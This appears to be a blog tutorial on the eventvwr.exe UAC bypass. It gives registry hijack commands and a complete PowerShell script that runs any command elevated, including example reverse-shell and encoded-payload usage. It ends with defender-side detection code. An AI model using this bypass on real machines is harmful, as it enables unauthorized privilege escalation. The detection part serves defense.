Bypass UAC Eventvwr

Bypass UAC eventvwr.exe

```powershell
sigcheck.exe -m C:\Windows\System32\eventvwr.exe
```

Output:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="amd64"
name="Microsoft.Windows.Eventlog.EventVwr"
type="win32"
/>
<description>Event Viewer Snapin Launcher</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="highestAvailable"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
```

Execution level

```xml
<requestedPrivileges>
<requestedExecutionLevel
level="highestAvailable"
uiAccess="false"
/>
</requestedPrivileges>
```

  • highestAvailable: the program runs with the highest privilege level the current user can obtain
  • requireAdministrator: the application runs only for administrators and must be launched with the administrator's full access token

level='highestAvailable': The application runs at the highest permission level that it can. If the user who starts the application is a member of the Administrators group, this option is the same as level='requireAdministrator'. If the highest available permission level is higher than the level of the opening process, the system prompts for credentials.

uiAccess='true' if you want the application to bypass user interface protection levels and drive input to higher-permission windows on the desktop; otherwise, uiAccess='false'. Defaults to uiAccess='false'. Set this argument to uiAccess='true' only for user interface accessibility applications.


The autoElevate flag is set to true, which allows the executable to elevate automatically to high integrity without prompting an administrator user for consent:

```xml
<autoElevate>true</autoElevate>
```


Process Monitor Filter:

  • Process Name is eventvwr.exe
  • Operation contains Reg
  • Result is NAME NOT FOUND

The following entries appear:

```
HKCU\Software\Classes\mscfile\shell\open\command    NAME NOT FOUND
HKCR\mscfile\shell\open\command\DelegateExecute NAME NOT FOUND
```

Check HKCR\mscfile\shell\open\command\(default):

```
%SystemRoot%\system32\mmc.exe "%1" %*
```

Create the missing key and add the value (without the value, Event Viewer reports: Cannot start Event Viewer):

```cmd
REG ADD HKCU\Software\Classes\mscfile\shell\open\command

REG ADD HKCU\Software\Classes\mscfile\shell\open\command /d "cmd /c start C:\Windows\System32\cmd.exe" /f
```

If C:\Windows\System32\cmd.exe is used directly as the value, no cmd window is opened; cmd runs in the background.



Process Monitor Filter:

  • PATH contains mscfile\shell\open\command
  • remove the "Result is NAME NOT FOUND" condition

Re-run eventvwr; Process Monitor now shows the per-user key being found:

```
HKCU\Software\Classes\mscfile\shell\open\command    SUCCESS
```

Launched with:

```powershell
Start-Process -FilePath C:\Windows\System32\eventvwr.exe
```




EventvwrBypassUAC.ps1

```powershell
<#
.SYNOPSIS
By adding a new registry structure under "HKCU\Software\Classes\" to perform a UAC bypass that starts any application.

Only tested on Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601

.NOTES
Function  : EventvwrBypassUAC
File Name : EventvwrBypassUAC.ps1
Author    : 0x20c

.PARAMETER Command
Any command.
EventvwrBypassUAC -Command powershell -enc EDFH...
EventvwrBypassUAC -Command "cmd /c start C:\Windows\reverse.exe"

.LINK
https://github.com/0x20c

.EXAMPLE
EventvwrBypassUAC -Command "cmd /c start cmd.exe"
#>

function EventvwrBypassUAC
{
    Param (
        [String]$Command = "cmd /c start cmd.exe" # default
    )

    # Create registry structure: the per-user mscfile handler that eventvwr.exe looks up first
    New-Item -Path HKCU:\Software\Classes\mscfile\shell\open\command -Force
    # New-ItemProperty -Path HKCU:\Software\Classes\mscfile\shell\open\command -Name "(default)" -PropertyType String -Value $Command -Force
    Set-ItemProperty -Path HKCU:\Software\Classes\mscfile\shell\open\command -Name "(default)" -Value $Command -Force

    # Perform the bypass: the auto-elevated eventvwr.exe runs the command in place of mmc.exe
    Start-Process "C:\Windows\System32\eventvwr.exe" -WindowStyle Hidden

    # Remove registry structure once eventvwr.exe has had time to read it
    Start-Sleep 3
    Remove-Item HKCU:\Software\Classes\mscfile -Recurse -Force
}
```
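The flip side of the script above is how a defender spots it. Everything the technique needs is visible in two places: the per-user override key HKCU\Software\Classes\mscfile\shell\open\command existing at all (the machine-wide handler under HKLM\Software\Classes is the one that should resolve), and a registry write to that path right before an eventvwr.exe launch. The PowerShell below is an added example written for this post, not code from the original article or from 0x20c: `Test-MscfileHijack` audits the current user's hive against the machine-wide handler, and `Get-MscfileRegistryWrites` pulls Sysmon registry events (Event ID 12 key create/delete, Event ID 13 value set) that touch the path. It assumes Sysmon is installed with a registry rule that covers Software\Classes\mscfile; the function names are my own.

```powershell
# Added example (not from the original post): defender-side checks for the
# mscfile\shell\open\command override that eventvwr.exe consults before the
# machine-wide handler. Function names are hypothetical; paths and log name are real.

function Test-MscfileHijack {
    <#
    .SYNOPSIS
    Reports whether a per-user mscfile open handler exists and what it points to,
    next to the expected machine-wide handler (normally mmc.exe "%1" %*).
    #>
    $userKey    = 'HKCU:\Software\Classes\mscfile\shell\open\command'
    $machineKey = 'HKLM:\Software\Classes\mscfile\shell\open\command'

    # The machine-wide handler is the baseline; HKCR merges HKCU over it, so any
    # HKCU entry wins for this user and is itself the finding.
    $expected = (Get-ItemProperty -Path $machineKey -ErrorAction SilentlyContinue).'(default)'

    if (-not (Test-Path -Path $userKey)) {
        return [pscustomobject]@{
            Hijacked       = $false
            UserCommand    = $null
            MachineCommand = $expected
        }
    }

    $userCmd = (Get-ItemProperty -Path $userKey -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{
        Hijacked       = $true
        UserCommand    = $userCmd      # whatever eventvwr.exe would launch elevated
        MachineCommand = $expected
    }
}

function Get-MscfileRegistryWrites {
    <#
    .SYNOPSIS
    Returns Sysmon registry events (ID 12 = key create/delete, ID 13 = value set)
    whose TargetObject is the mscfile shell\open\command path in any hive.
    Assumes Sysmon is installed with a registry rule that covers Software\Classes\mscfile.
    #>
    param([int]$MaxEvents = 1000)

    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = @(12, 13) }

    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Parse the event XML so fields are looked up by name rather than by index,
            # which differs between Sysmon versions.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

            if ($data['TargetObject'] -like '*\Classes\mscfile\shell\open\command*') {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    EventId = $_.Id
                    Image   = $data['Image']         # process that wrote the key (expect powershell/reg.exe here)
                    Target  = $data['TargetObject']
                    Details = $data['Details']       # the command string for ID 13 events
                }
            }
        }
}

# Usage:
Test-MscfileHijack
Get-MscfileRegistryWrites | Format-Table -AutoSize
```

The first function is a point-in-time check and will miss the script above once its Remove-Item has run three seconds later, which is exactly why the second function matters: the Sysmon value-set event records the command string in Details and the writing process in Image, and the short-lived key followed by an eventvwr.exe process start is the pattern to alert on. Remediation is the same Remove-Item on HKCU:\Software\Classes\mscfile that the script itself uses for cleanup.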

All articles on this blog, unless otherwise stated, are licensed under CC BY-SA 4.0; please credit the source when reposting.